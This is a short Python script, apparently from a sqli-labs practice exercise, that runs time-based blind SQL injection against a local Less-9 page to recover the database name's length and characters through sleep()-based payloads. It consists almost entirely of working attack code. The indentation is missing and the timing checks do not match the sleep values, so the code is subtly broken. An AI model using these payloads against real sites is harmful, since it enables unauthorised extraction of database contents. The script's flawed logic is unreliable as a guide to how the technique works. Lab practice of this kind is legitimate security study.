import requests,datetime
def database_length():
for i in range(1,9):
url = "http://127.0.0.1/sql/Less-9/?id=1"
payload = "' and if(length(database())>%d,sleep(1),1)--+" % i
time1=datetime.datetime.now()
response = requests.get(url+payload)
time2=datetime.datetime.now()
if(time2-time1).seconds <5: #这里经测试SQLi最少以5秒开始,所以最小值为5
break
print('database_length:',i)
database_length()
def database_name():
#这里存储结果的值必须是全局的!!!,因为放在for循环中会被每次循环刷新掉
d_name=''
#定义结果的两个范围-->对应位置的对应的字符
for a in range(1,9):
for b in '0123456789abcdefghijklmnopqrstuvwxyz':
# 定义结果的两个范围-->对应位置的对应的字符
url = "http://127.0.0.1/sql/Less-9/?id=1"
payload = "' and if(substr(database(),%d,1)='%s',sleep(1),1)--+" % (a,str(b))
#通过访问url+payload的时间差来判断字符
time1 = datetime.datetime.now()
response = requests.get(url+payload)
time2 = datetime.datetime.now()
if(time2-time1).seconds >=5: #这里不能通过<5,因为有多个字符串格式,会造成逻辑不对
d_name+=b
break
print('database_name:',d_name)
database_name()
结果: